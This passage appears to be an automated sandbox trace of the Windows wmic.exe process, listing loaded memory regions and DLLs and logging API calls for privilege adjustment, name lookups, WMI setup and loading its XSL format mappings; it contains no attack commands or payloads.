"private_0x0000000005a60000" filename = "" Region: id = 5768 start_va = 0x50c0000 end_va = 0x50c0fff entry_point = 0x50c0000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 5769 start_va = 0x50d0000 end_va = 0x50effff entry_point = 0x0 region_type = private name = "private_0x00000000050d0000" filename = "" Region: id = 5770 start_va = 0x738a0000 end_va = 0x739fffff entry_point = 0x738a0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 5771 start_va = 0x77550000 end_va = 0x775cafff entry_point = 0x77550000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5772 start_va = 0x73bb0000 end_va = 0x73e70fff entry_point = 0x73bb0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 5773 start_va = 0x77300000 end_va = 0x7738cfff entry_point = 0x77300000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5774 start_va = 0x74da0000 end_va = 0x74de3fff entry_point = 0x74da0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5775 start_va = 0x75030000 end_va = 0x7517cfff entry_point = 0x75030000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5776 start_va = 0x76c70000 end_va = 0x76daffff entry_point = 0x76c70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5777 start_va = 0x5230000 end_va = 0x5259fff entry_point = 0x5230000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5778 start_va = 0x5290000 end_va = 0x529ffff entry_point = 0x0 region_type = private name = "private_0x0000000005290000" filename = "" Region: id = 5779 start_va = 0x5e60000 end_va = 0x5fe7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005e60000" filename = "" Region: id = 5780 start_va = 0x74f10000 end_va = 0x74f3afff entry_point = 0x74f10000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5781 start_va = 0x74df0000 end_va = 0x74f0ffff entry_point = 0x74df0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 5787 start_va = 0x5230000 end_va = 0x523ffff entry_point = 0x5230000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmic.exe.mui") Region: id = 5788 start_va = 0x5ff0000 end_va = 0x6170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005ff0000" filename = "" Region: id = 5789 start_va = 0x6180000 end_va = 0x757ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006180000" filename = "" Region: id = 5790 start_va = 0x5240000 end_va = 0x5240fff entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 5791 start_va = 0x5250000 end_va = 0x5250fff entry_point = 0x0 region_type = private name = "private_0x0000000005250000" filename = "" Region: id = 5792 start_va = 0x743e0000 end_va = 0x74603fff entry_point = 0x743e0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 5793 start_va = 0x77170000 end_va = 0x77259fff entry_point = 0x77170000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5794 start_va = 0x74630000 end_va = 0x746a4fff entry_point = 0x74630000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 5795 start_va = 0x5670000 end_va = 0x56fffff entry_point = 0x0 region_type = private name = "private_0x0000000005670000" filename = "" Region: id = 5796 start_va = 0x5740000 end_va = 0x574ffff entry_point = 0x0 region_type = private name = "private_0x0000000005740000" filename = "" Region: id = 5797 start_va = 0x5260000 end_va = 0x5260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005260000" filename = "" Region: id = 5798 start_va = 0x58e0000 end_va = 0x5997fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000058e0000" filename = "" Region: id = 5799 start_va = 0x5a50000 end_va = 0x5a5ffff entry_point = 0x0 region_type = private name = "private_0x0000000005a50000" filename = "" Region: id = 5800 start_va = 0x5260000 end_va = 0x5263fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005260000" filename = "" Region: id = 5801 start_va = 0x74610000 end_va = 0x7462cfff entry_point = 0x74610000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 5802 start_va = 0x743c0000 end_va = 0x743d2fff entry_point = 0x743c0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 5803 start_va = 0x74370000 end_va = 0x7439efff entry_point = 0x74370000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 5804 start_va = 0x52a0000 end_va = 0x52dffff entry_point = 0x0 region_type = private name = "private_0x00000000052a0000" filename = "" Region: id = 5805 start_va = 0x5300000 end_va = 0x530ffff entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 5806 start_va = 0x5670000 end_va = 0x56affff entry_point = 0x0 region_type = private name = "private_0x0000000005670000" filename = "" Region: id = 5807 start_va = 0x56b0000 end_va = 0x56effff entry_point = 0x0 region_type = private name = "private_0x00000000056b0000" filename = "" Region: id = 5808 start_va = 0x56f0000 end_va = 0x56fffff entry_point = 0x0 region_type = private name = "private_0x00000000056f0000" filename = "" Region: id = 5809 start_va = 0x5700000 end_va = 0x573ffff entry_point = 0x0 region_type = private name = "private_0x0000000005700000" filename = "" Region: id = 5810 start_va = 0x5840000 end_va = 0x587ffff entry_point = 0x0 region_type = private name = "private_0x0000000005840000" filename = "" Region: id = 5811 start_va = 0x5880000 end_va = 0x58bffff entry_point = 0x0 region_type = private name = "private_0x0000000005880000" filename = "" Region: id = 5812 start_va = 0x59a0000 end_va = 0x59dffff entry_point = 0x0 region_type = private name = "private_0x00000000059a0000" filename = "" Region: id = 5813 start_va = 0x59e0000 end_va = 0x5a1ffff entry_point = 0x0 region_type = private name = "private_0x00000000059e0000" filename = "" Region: id = 5814 start_va = 0x7e744000 end_va = 0x7e746fff entry_point = 0x0 region_type = private name = "private_0x000000007e744000" filename = "" Region: id = 5815 start_va = 0x7e747000 end_va = 0x7e749fff entry_point = 0x0 region_type = private name = "private_0x000000007e747000" filename = "" Region: id = 5816 start_va = 0x7e74a000 end_va = 0x7e74cfff entry_point = 0x0 region_type = private name = "private_0x000000007e74a000" filename = "" Region: id = 5817 start_va = 0x7e74d000 end_va = 0x7e74ffff entry_point = 0x0 region_type = private name = "private_0x000000007e74d000" filename = "" Region: id = 5818 start_va = 0x73520000 end_va = 0x735fbfff entry_point = 0x73520000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\SysWOW64\\ucrtbase.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase.dll") Region: id = 5819 start_va = 0x73600000 end_va = 0x73614fff entry_point = 0x73600000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\SysWOW64\\vcruntime140.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140.dll") Region: id = 5820 start_va = 0x73620000 end_va = 0x7362dfff entry_point = 0x73620000 region_type = mapped_file name = "msoxmlmf.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSOXMLMF.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\msoxmlmf.dll") Region: id = 5821 start_va = 0x7580000 end_va = 0x767ffff entry_point = 0x0 region_type = private name = "private_0x0000000007580000" filename = "" Region: id = 5822 start_va = 0x73500000 end_va = 0x73510fff entry_point = 0x73500000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 6296 start_va = 0x73380000 end_va = 0x7343bfff entry_point = 0x73380000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 6305 start_va = 0x5270000 end_va = 0x527cfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005270000" filename = "" Region: id = 6402 start_va = 0x732f0000 end_va = 0x7330dfff entry_point = 0x732f0000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll") Region: id = 6403 start_va = 0x5270000 end_va = 0x5274fff entry_point = 0x5270000 region_type = mapped_file name = "wmiutils.dll.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\wmiutils.dll.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmiutils.dll.mui") Thread: id = 11 os_tid = 0x538 [0106.008] GetModuleHandleA (lpModuleName=0x0) returned 0x960000 [0106.008] __set_app_type (_Type=0x1) [0106.008] __p__fmode () returned 0x76fd4d6c [0106.008] __p__commode () returned 0x76fd5b1c [0106.008] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x99aa90) returned 0x0 [0106.008] __wgetmainargs (in: _Argc=0x9a91a8, _Argv=0x9a91ac, _Env=0x9a91b0, _DoWildCard=0, _StartInfo=0x9a91bc | out: _Argc=0x9a91a8, _Argv=0x9a91ac, _Env=0x9a91b0) returned 0 [0106.017] ??0CHString@@QAE@XZ () returned 0x9a95ec [0106.019] ??0CHString@@QAE@XZ () returned 0x9a98fc [0106.019] ?Empty@CHString@@QAEXXZ () returned 0x740c6424 [0106.019] SetConsoleCtrlHandler (HandlerRoutine=0x994980, Add=1) returned 1 [0106.019] _onexit (_Func=0x9a0a20) returned 0x9a0a20 [0106.020] _onexit (_Func=0x9a0a30) returned 0x9a0a30 [0106.020] _onexit (_Func=0x9a0a50) returned 0x9a0a50 [0106.020] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0106.020] ResolveDelayLoadedAPI () returned 0x773fcd50 [0106.020] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0106.023] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0106.031] CoCreateInstance (in: rclsid=0x966a1c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x966a2c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x9a9510 | out: ppv=0x9a9510*=0x5105b70) returned 0x0 [0106.488] GetCurrentProcess () returned 0xffffffff [0106.488] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x4edfaec | out: TokenHandle=0x4edfaec*=0x158) returned 1 [0106.488] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4edfae8 | out: TokenInformation=0x0, ReturnLength=0x4edfae8) returned 0 [0106.488] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x5323948, TokenInformationLength=0x118, ReturnLength=0x4edfae8 | out: TokenInformation=0x5323948, ReturnLength=0x4edfae8) returned 1 [0106.488] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0x5323948*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0106.488] CloseHandle (hObject=0x158) returned 1 [0106.488] SetThreadUILanguage (LangId=0x0) returned 0x409 [0106.491] _vsnwprintf (in: _Buffer=0x53239d8, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x4edfa74 | out: _Buffer="ms_409") returned 6 [0106.491] GetComputerNameW (in: lpBuffer=0x5323a20, nSize=0x4edfad8 | out: lpBuffer="LHNIWSJ", nSize=0x4edfad8) returned 1 [0106.491] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.491] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.491] ResolveDelayLoadedAPI () returned 0x747cc5f0 [0106.491] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x4edfaec | out: lpNameBuffer=0x0, nSize=0x4edfaec) returned 0x0 [0106.492] GetLastError () returned 0xea [0106.492] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x5323a60, nSize=0x4edfaec | out: lpNameBuffer="LHNIWSJ\\CIiHmnxMn6Ps", nSize=0x4edfaec) returned 0x1 [0106.492] lstrlenW (lpString="") returned 0 [0106.492] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.493] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0106.494] lstrlenW (lpString=".") returned 1 [0106.494] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.494] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2=".", cchCount2=1) returned 3 [0106.494] lstrlenW (lpString="LOCALHOST") returned 9 [0106.494] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.494] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LOCALHOST", cchCount2=9) returned 1 [0106.494] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.494] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.494] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LHNIWSJ", cchCount2=7) returned 2 [0106.494] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.494] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.494] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.494] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.494] ResolveDelayLoadedAPI () returned 0x770e9840 [0106.497] SysStringLen (param_1="IDENTIFY") returned 0x8 [0106.497] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0106.497] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0106.497] SysStringLen (param_1="IDENTIFY") returned 0x8 [0106.497] SysStringLen (param_1="IMPERSONATE") returned 0xb [0106.497] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0106.497] SysStringLen (param_1="IMPERSONATE") returned 0xb [0106.497] SysStringLen (param_1="IDENTIFY") returned 0x8 [0106.497] SysStringLen (param_1="IDENTIFY") returned 0x8 [0106.497] SysStringLen (param_1="IMPERSONATE") returned 0xb [0106.497] SysStringLen (param_1="DELEGATE") returned 0x8 [0106.497] SysStringLen (param_1="IDENTIFY") returned 0x8 [0106.497] SysStringLen (param_1="DELEGATE") returned 0x8 [0106.497] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0106.497] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0106.497] SysStringLen (param_1="DELEGATE") returned 0x8 [0106.498] SysStringLen (param_1="NONE") returned 0x4 [0106.498] SysStringLen (param_1="DEFAULT") returned 0x7 [0106.498] SysStringLen (param_1="DEFAULT") returned 0x7 [0106.498] SysStringLen (param_1="NONE") returned 0x4 [0106.498] SysStringLen (param_1="CONNECT") returned 0x7 [0106.498] SysStringLen (param_1="DEFAULT") returned 0x7 [0106.498] SysStringLen (param_1="CALL") returned 0x4 [0106.498] SysStringLen (param_1="DEFAULT") returned 0x7 [0106.498] SysStringLen (param_1="CALL") returned 0x4 [0106.498] SysStringLen (param_1="CONNECT") returned 0x7 [0106.499] SysStringLen (param_1="PKT") returned 0x3 [0106.499] SysStringLen (param_1="DEFAULT") returned 0x7 [0106.499] SysStringLen (param_1="PKT") returned 0x3 [0106.499] SysStringLen (param_1="NONE") returned 0x4 [0106.499] SysStringLen (param_1="NONE") returned 0x4 [0106.499] SysStringLen (param_1="PKT") returned 0x3 [0106.499] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0106.499] SysStringLen (param_1="DEFAULT") returned 0x7 [0106.499] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0106.499] SysStringLen (param_1="NONE") returned 0x4 [0106.499] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0106.499] SysStringLen (param_1="PKT") returned 0x3 [0106.499] SysStringLen (param_1="PKT") returned 0x3 [0106.499] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0106.499] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0106.499] SysStringLen (param_1="DEFAULT") returned 0x7 [0106.499] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0106.499] SysStringLen (param_1="PKT") returned 0x3 [0106.499] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0106.499] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0106.499] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0106.499] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0106.499] GetSystemDirectoryW (in: lpBuffer=0x5322998, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0106.499] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0106.499] SysStringLen (param_1="\\wbem\\") returned 0x6 [0106.500] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0106.500] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0106.500] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0106.500] GetCurrentThreadId () returned 0x538 [0106.500] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x4edf5fc | out: phkResult=0x4edf5fc*=0x164) returned 0x0 [0106.500] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x4edf608, lpcbData=0x4edf604*=0x400 | out: lpType=0x0, lpData=0x4edf608*=0x30, lpcbData=0x4edf604*=0x4) returned 0x0 [0106.500] _wcsicmp (_String1="0", _String2="1") returned -1 [0106.500] _wcsicmp (_String1="0", _String2="2") returned -2 [0106.500] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x4edf604*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x4edf604*=0x42) returned 0x0 [0106.500] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x5326c00, lpcbData=0x4edf604*=0x42 | out: lpType=0x0, lpData=0x5326c00*=0x25, lpcbData=0x4edf604*=0x42) returned 0x0 [0106.500] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0106.500] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0106.500] RegQueryValueExW (in: hKey=0x164, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x4edf608, lpcbData=0x4edf604*=0x400 | out: lpType=0x0, lpData=0x4edf608*=0x36, lpcbData=0x4edf604*=0xc) returned 0x0 [0106.500] _wtol (_String="65536") returned 65536 [0106.500] RegCloseKey (hKey=0x0) returned 0x6 [0106.500] CoCreateInstance (in: rclsid=0x966a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x966a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x4edfa9c | out: ppv=0x4edfa9c*=0x52945a8) returned 0x0 [0107.254] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x52945a8, xmlSource=0x4edfa1c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x4edfa80 | out: isSuccessful=0x4edfa80*=0xffff) returned 0x0 [0107.445] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x52945a8, DOMElement=0x4edfa94 | out: DOMElement=0x4edfa94*=0x5296b48) returned 0x0 [0107.446] IXMLDOMElement:getElementsByTagName (in: This=0x5296b48, tagName="XSLFORMAT", resultList=0x4edfa90 | out: resultList=0x4edfa90*=0x5299ca0) returned 0x0 [0107.449] IXMLDOMNodeList:get_length (in: This=0x5299ca0, listLength=0x4edfa88 | out: listLength=0x4edfa88*=21) returned 0x0 [0107.451] IXMLDOMNodeList:get_item (in: This=0x5299ca0, index=0, listItem=0x4edfaac | out: listItem=0x4edfaac*=0x5296b88) returned 0x0 [0107.451] IXMLDOMNode:get_text (in: This=0x5296b88, text=0x4edfab0 | out: text=0x4edfab0*="texttable.xsl") returned 0x0 [0107.451] IXMLDOMNode:get_attributes (in: This=0x5296b88, attributeMap=0x4edfaa8 | out: attributeMap=0x4edfaa8*=0x5299fa8) returned 0x0 [0107.452] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5299fa8, name="KEYWORD", namedItem=0x4edfaa4 | out: namedItem=0x4edfaa4*=0x5299ff8) returned 0x0 [0107.452] IXMLDOMNode:get_nodeValue (in: This=0x5299ff8, value=0x4edfa64 | out: value=0x4edfa64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0107.452] IUnknown:Release (This=0x5296b88) returned 0x0 [0107.452] IUnknown:Release (This=0x5299fa8) returned 0x0 [0107.452] IUnknown:Release (This=0x5299ff8) returned 0x0 [0107.452] IXMLDOMNodeList:get_item (in: This=0x5299ca0, index=1, listItem=0x4edfaac | out: listItem=0x4edfaac*=0x5296b88) returned 0x0 [0107.452] IXMLDOMNode:get_text (in: This=0x5296b88, text=0x4edfab0 | out: text=0x4edfab0*="textvaluelist.xsl") returned 0x0 [0107.452] IXMLDOMNode:get_attributes (in: This=0x5296b88, attributeMap=0x4edfaa8 | out: attributeMap=0x4edfaa8*=0x5299fa8) returned 0x0 [0107.452] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5299fa8, name="KEYWORD", namedItem=0x4edfaa4 | out: namedItem=0x4edfaa4*=0x5299ff8) returned 0x0 [0107.452] IXMLDOMNode:get_nodeValue (in: This=0x5299ff8, value=0x4edfa64 | out: value=0x4edfa64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0107.453] SysStringLen (param_1="VALUE") returned 0x5 [0107.453] SysStringLen (param_1="TABLE") returned 0x5 [0107.453] SysStringLen (param_1="TABLE") returned 0x5 [0107.453] SysStringLen (param_1="VALUE") returned 0x5 [0107.453] IUnknown:Release (This=0x5296b88) returned 0x0 [0107.453] IUnknown:Release (This=0x5299fa8) returned 0x0 [0107.453] IUnknown:Release (This=0x5299ff8) returned 0x0 [0107.453] IXMLDOMNodeList:get_item (in: This=0x5299ca0, index=2, listItem=0x4edfaac | out: listItem=0x4edfaac*=0x5296b88) returned 0x0 [0107.453] IXMLDOMNode:get_text (in: This=0x5296b88, text=0x4edfab0 | out: text=0x4edfab0*="textvaluelist.xsl") returned 0x0 [0107.453] IXMLDOMNode:get_attributes (in: This=0x5296b88, attributeMap=0x4edfaa8 | out: attributeMap=0x4edfaa8*=0x5299fa8) returned 0x0 [0107.453] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5299fa8, name="KEYWORD", namedItem=0x4edfaa4 | out: namedItem=0x4edfaa4*=0x5299ff8) returned 0x0 [0107.453] IXMLDOMNode:get_nodeValue (in: This=0x5299ff8, value=0x4edfa64 | out: value=0x4edfa64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0 [0107.453] SysStringLen (param_1="LIST") returned 0x4 [0107.453] SysStringLen (param_1="TABLE") returned 0x5 [0107.453] IUnknown:Release (This=0x5296b88) returned 0x0 [0107.453] IUnknown:Release (This=0x5299fa8) returned 0x0 [0107.453] IUnknown:Release (This=0x5299ff8) returned 0x0 [0107.453] IXMLDOMNodeList:get_item (in: This=0x5299ca0, index=3, listItem=0x4edfaac | out: listItem=0x4edfaac*=0x5296b88) returned 0x0 [0107.453] IXMLDOMNode:get_text (in: This=0x5296b88, text=0x4edfab0 | out: text=0x4edfab0*="rawxml.xsl") returned 0x0 [0107.453] IXMLDOMNode:get_attributes (in: This=0x5296b88, attributeMap=0x4edfaa8 | out: attributeMap=0x4edfaa8*=0x5299fa8) returned 0x0 [0107.454] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5299fa8, name="KEYWORD", namedItem=0x4edfaa4 | out: namedItem=0x4edfaa4*=0x5299ff8) returned 0x0 [0107.454] IXMLDOMNode:get_nodeValue (in: This=0x5299ff8, value=0x4edfa64 | out: value=0x4edfa64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0107.454] SysStringLen (param_1="RAWXML") returned 0x6 [0107.454] SysStringLen (param_1="TABLE") returned 0x5 [0107.454] SysStringLen (param_1="RAWXML") returned 0x6 [0107.454] SysStringLen (param_1="LIST") returned 0x4 [0107.454] SysStringLen (param_1="LIST") returned 0x4 [0107.454] SysStringLen (param_1="RAWXML") returned 0x6 [0107.454] IUnknown:Release (This=0x5296b88) returned 0x0 [0107.454] IUnknown:Release (This=0x5299fa8) returned 0x0 [0107.454] IUnknown:Release (This=0x5299ff8) returned 0x0 [0107.454] IXMLDOMNodeList:get_item (in: This=0x5299ca0, index=4, listItem=0x4edfaac | out: listItem=0x4edfaac*=0x5296b88) returned 0x0 [0107.454] IXMLDOMNode:get_text (in: This=0x5296b88, text=0x4edfab0 | out: text=0x4edfab0*="htable.xsl") returned 0x0 [0107.454] IXMLDOMNode:get_attributes (in: This=0x5296b88, attributeMap=0x4edfaa8 | out: attributeMap=0x4edfaa8*=0x5299fa8) returned 0x0 [0107.454] 